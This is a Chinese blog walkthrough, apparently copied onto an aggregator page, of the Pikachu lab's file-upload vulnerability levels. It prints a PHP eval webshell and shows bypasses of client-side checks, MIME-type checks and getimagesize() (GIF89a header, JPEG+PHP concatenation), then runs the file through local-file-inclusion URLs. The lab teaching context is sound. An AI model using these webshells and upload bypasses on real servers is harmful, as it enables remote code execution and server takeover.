当前位置：首页 > news >正文

快速网站模板公司/百度优化排名

news 文章来源：https://blog.csdn.net/ZhaoSong_/article/details/132379331 2025/3/10 11:12:42

快速网站模板公司,百度优化排名,深圳市中心在哪,上海网站建设推荐秒搜科技文章目录 client checkMIME Typegetimagesize 文件上传功能在web应用系统很常见，比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后，后台会对上传的文件进行判断比如是否是指定的类型、后缀名、大小等等，然后将其按…

文章目录

- - client check
  - MIME Type
  - getimagesize

文件上传功能在web应用系统很常见，比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后，后台会对上传的文件进行判断

比如是否是指定的类型、后缀名、大小等等，然后将其按照设计的格式进行重命名后存储在指定的目录。

如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨，则攻击着可能会上传一些恶意的文件，比如一句话木马，从而导致后台服务器被webshell。

所以，在设计文件上传功能时，一定要对传进来的文件进行严格的安全考虑。比如：

--验证文件类型、后缀名、大小;
--验证文件的上传方式;
--对文件进行一定复杂的重命名;
--不要暴露文件上传后的路径;

client check

上传一句话木马1.php

<?php eval(@$_POST['password']);?>

报错显示说不符合要求

查看页面代码，发现有js函数做验证

前端校验不值一提，直接删除js校验函数

这时候一句话木马已经上传，可以通过蚁剑来连接进入

木马上传的路径

192.168.80.139/pikachu/vul/unsafeupload/uploads/1.php

MIME Type

MIME（多用途互联网邮件扩展类型），是设定某种扩展名的文件用一种应用程序来打开的方式类型，当该扩展文件被访问的时候，浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名，以及一些媒体文件打开方式。
每个MIME类型由两部分组成，前面是数据的大类别，例如声音audio、图像image等，后面定义具体的种类，常见的MIME类型，比如：

超文本标记语言文本.html texthtml
普通文本.txt text/plain
RTF文本.rtf application/rtf
GIF图形.gif image/gif
JPEG图形.ipeg.jpg image/jpeg

继续提交php木马文件，使用Burpsuite抓取数据包，发送到Repeater修改Content-Type

getimagesize

菜鸟教程

Getimagesize是PHP提供的一个用来判断目标文件是不是图片的函数

对文件的开头内容进行了检测并且通过二进制识别是否为图像，那么就可以利用文件头欺骗，来让getimagesize()函数检测无效。

1、制作图片木马方式一

这里用GIF的文件头，在一句话木马前加上GIF的文件头标识，后缀改为png格式

GIF89a
<?php phpinfo(); ?>

图片上传后保存的地址：http://192.168.80.139/pikachu/vul/unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png

通过使用文件包含路径去访问后门文件

http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

2、制作图片木马方式二

准备一个jpeg格式的图片，还有一个php木马文件

通过CMD命令将两个合成一个ws.jpeg，生成的文件前面内容是2.jpeg，后面是12.php内容

copy /d 2.jpeg + 12.php   ws.jpeg

上传ws.jpeg图片

uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg

虽然我们绕过getimagesize()，成功上传图片，但只访问图片里面的php代码是执行不了的

需要通过文件包含路径去访问木马文件

http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

快速网站模板公司/百度优化排名

文章目录

client check

MIME Type

getimagesize

相关文章：

Unsafe upfileupload

机器人制作开源方案 | 滑板助力器

飞机打方块（二）游戏界面制作

自我理解：精度(precision)和召回(recall)

Nginx 使用 HTTPS（准备证书和私钥）

Java：集合框架：Set集合、LinkedSet集合、TreeSet集合、哈希值、HashSet的底层原理

自定义Taro的navBar的宽度和高度

用Python编程实现百度自然语言处理接口的对接，助力你开发智能化处理程序

系统架构设计专业技能 · 系统工程与系统性能

初识网络原理（笔记）

嵌入式C语言基本操作方法之经典

postgresql \watch实用的使用方法

Cocos2d 项目问题记录

系统架构合理性的思考 | 京东云技术团队

Amelia预订插件：WordPress企业级预约系统

共享门店模式：线下门店的商家如何利用它增加客户

实现矩阵地图与rviz地图重合

设计模式十九：备忘录模式（Memento Pattern）

【题解】二叉搜索树与双向链表

【真实案例】解决后端接口调用偶尔超时问题

操作符详解(1)

＜指针进阶＞指针数组和数组指针傻傻分不清？

无代码集成飞书连接更多应用

三分钟解决AE缓存预览渲染错误、暂停、卡顿问题

朴实无华的数据增强然后训练一下应用在电网异物检测领域，好像有自己的数据集就能发文了

【使用教程】在Ubuntu下运行CANopen通信PMM伺服电机使用教程(NimServoSDK_V2.0.0)

vue3+ts+vite项目页面初始化loading加载效果

ElasticSearch 数据聚合、自动补全（自定义分词器）、数据同步

神经网络基础-神经网络补充概念-18-多个样本的向量化

*看门狗1